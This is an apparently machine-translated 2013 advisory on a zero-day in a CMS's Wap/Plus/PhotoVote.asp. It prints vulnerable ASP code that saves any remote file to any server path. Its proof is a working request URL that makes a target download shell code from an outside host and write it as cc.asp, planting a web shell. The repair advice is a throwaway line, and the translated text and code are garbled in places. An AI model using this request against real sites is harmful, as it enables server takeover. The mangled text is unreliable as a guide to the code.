Tech-ex 6. x~8. x getshell 0day-vulnerability warning-the black bar safety net

2013-04-08T00:00:00
ID MYHACK58:62201338182
Type myhack58
Reporter 佚名
Modified 2013-04-08T00:00:00

Description

Brief description:

Not on the submitted parameter is determined, the result can be written to any file on the server...

Detailed description:

Wap/Plus/PhotoVote. asp 1 4 - 2 3

Dim KS:Set KS=New PublicCls Dim ID:ID = Replace(KS. S("ID")," ","") Dim ChannelID:ChannelID=KS. G("ChannelID") If ChannelID="" Then ChannelID=2 If the KS. G("LocalFileName")<>"" And KS. G("RemoteFileUrl")<>"" Then If the KS. SaveBeyondFile(KS. G("LocalFileName"),KS. G("RemoteFileUrl"))= True Then Response. write KS. G("LocalFileName")'error message End If End If

Code slightly......

'================================================== 'Process name: SaveBeyondFile 'Action: save the remote file to the local 'Parameters: LocalFileName------ the local file name 'Parameters: RemoteFileUrl------ the remote file URL '================================================== Function SaveBeyondFile(LocalFileName,RemoteFileUrl) On Error Resume Next SaveBeyondFile=True dim Ads,Retrieval,GetRemoteData Set Retrieval = Server. CreateObject("Microsoft. XMLHTTP") With Retrieval . Open "Get", RemoteFileUrl, False, "", "" . Send If . Readystate<>4 then SaveBeyondFile=False Exit Function End If GetRemoteData = . ResponseBody End With Set Retrieval = Nothing Set Ads = Server. CreateObject("Adodb. Stream") With Ads . Type = 1 . Open . Write GetRemoteData . SaveToFile server. MapPath(LocalFileName),2 . Cancel() . Close() End With If Err. Number<>0 Then Err. Clear SaveBeyondFile=False Exit Function End If Set Ads=nothing End Function

In the above code this in a few sentences: If the KS. G("LocalFileName")<>"" And KS. G("RemoteFileUrl")<>"" Then If the KS. SaveBeyondFile(KS. G("LocalFileName"),KS. G("RemoteFileUrl"))= True Then Response. write KS. G("LocalFileName")'error message End If End If KS. G("LocalFileName")and KS. G("RemoteFileUrl")is merely to determine whether the air and filter some SQL characters and then just write the file!

Vulnerability proof:

After landing access to: http://www.t00ls.net/Wap/Plus/PhotoVote.asp?LocalFileName=cc.asp&RemoteFileUrl=http://www.bksec.net/1.txt Success in the Wap/Plus a write to the cc. asp,and returns the file name, including the 1. txt to the shell code.

Repair solutions:

Judgment&filter,you know know